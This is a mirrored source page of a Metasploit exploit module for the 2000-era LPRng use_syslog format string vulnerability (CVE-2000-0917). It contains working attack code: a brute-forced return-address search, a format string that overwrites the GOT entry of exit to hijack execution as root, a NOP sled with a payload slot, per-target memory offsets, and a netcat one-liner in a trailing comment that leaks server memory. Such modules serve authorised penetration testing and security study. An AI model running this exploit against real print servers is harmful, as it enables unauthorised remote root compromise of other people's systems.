Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/lprng_format_string.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::Brute
11
include Msf::Exploit::FormatString
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'LPRng use_syslog Remote Format String Vulnerability',
18
'Description' => %q{
19
This module exploits a format string vulnerability in the LPRng print server.
20
This vulnerability was discovered by Chris Evans. There was a publicly
21
circulating worm targeting this vulnerability, which prompted RedHat to pull
22
their 7.0 release. They consequently re-released it as "7.0-respin".
23
},
24
'Author' => [ 'jduck' ],
25
'License' => MSF_LICENSE,
26
'References' => [
27
[ 'CVE', '2000-0917' ],
28
[ 'OSVDB', '421' ],
29
[ 'BID', '1712' ],
30
[ 'US-CERT-VU', '382365' ],
31
[ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],
32
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],
33
[ 'EDB', '226' ],
34
[ 'EDB', '227' ],
35
[ 'EDB', '230' ]
36
],
37
'Platform' => 'linux',
38
'Arch' => ARCH_X86,
39
'Privileged' => true, # root
40
'DefaultOptions' => {
41
'PrependSetresuid' => true
42
},
43
'Payload' => {
44
'Space' => 130, # buffer size on caldera is 180! (need ~50 for fmt)
45
'BadChars' => "\x00\x0a\x20\x25",
46
},
47
'Targets' => [
48
# tested OK - jjd
49
[
50
'Caldera OpenLinux 2.3 Bruteforce',
51
{
52
'Platform' => 'linux',
53
'NumPops' => 243,
54
'FlowHook' => 0x80992d4, # GOT of exit
55
# (0x809c180+(41+4+10+48)) - data segment, but gets corrupted
56
'Bruteforce' =>
57
{
58
'Start' => { 'Ret' => 0xcffffff4 },
59
'Stop' => { 'Ret' => 0x7fffe004 },
60
'Step' => 16
61
}
62
}
63
],
64
=begin
65
# untested (from public exploits)
66
[ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',
67
{
68
'NumPops' => 299,
69
'Ret' => 0xbffff640,
70
'FlowHook' => 0xbfffee30
71
}
72
],
73
[ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',
74
{
75
'NumPops' => 304,
76
'Ret' => 0xbffff920,
77
'FlowHook' => 0xbffff0f0
78
}
79
],
80
[ 'RedHat 7.0 - Guinesss',
81
{
82
'NumPops' => 300,
83
'Ret' => 0x41424344,
84
'FlowHook' => 0xbffff3ec
85
}
86
],
87
[ 'RedHat 7.0 - Guinesss-dev',
88
{
89
'NumPops' => 300,
90
'Ret' => 0x41424344,
91
'FlowHook' => 0xbffff12c
92
}
93
],
94
=end
95
# ...
96
[
97
'Debug',
98
{
99
'NumPops' => 1, # sure to miss.
100
'Ret' => 0x41424344,
101
'FlowHook' => 0x45464748
102
}
103
]
104
],
105
# 'DefaultTarget' => 0,
106
'DisclosureDate' => '2000-09-25',
107
'Notes' => {
108
'Reliability' => UNKNOWN_RELIABILITY,
109
'Stability' => UNKNOWN_STABILITY,
110
'SideEffects' => UNKNOWN_SIDE_EFFECTS
111
}
112
)
113
)
114
115
register_options([ Opt::RPORT(515) ])
116
end
117
118
def exploit
119
# we want to use DPA for this one :)
120
fmtstr_set_caps(false, true)
121
122
# check syslog to see which number hits 41414141
123
=begin
124
400.times { |x|
125
connect
126
buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]
127
sock.put(buf)
128
#handler
129
disconnect
130
}
131
=end
132
print_status("Trying target #{target.name} ..")
133
134
super
135
end
136
137
def brute_exploit(addrs)
138
# print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])
139
140
printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ...
141
num_start = printed.length + 2 + 4
142
143
# write 'ret' addr to flowhook (execute shellcode)
144
# NOTE: the resulting two writes must be done at the same time
145
146
# characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)
147
fmtbuf = "_" * 4
148
fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])
149
# print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")
150
151
# append payload and newline
152
# fmtbuf << payload.encoded
153
fmtbuf << "\x90" * 32
154
fmtbuf << Rex::Text.charset_exclude(payload_badchars)
155
fmtbuf << "\n"
156
157
print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])
158
159
connect
160
# print_status("Sleeping, attach now!!")
161
# select(nil,nil,nil,5)
162
163
sock.put(fmtbuf)
164
165
handler
166
disconnect
167
end
168
end
169
170
=begin
171
172
HRM!
173
174
The following causes info leakage!
175
176
bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC
177
178
There are various other ways to trigger the vulnerability. LPD uses the single-byte commands
179
0x01 -> 0x09...
180
181
It's unclear if there is a way to auto-detect the lpd version via LPD commands.
182
183
=end
184
185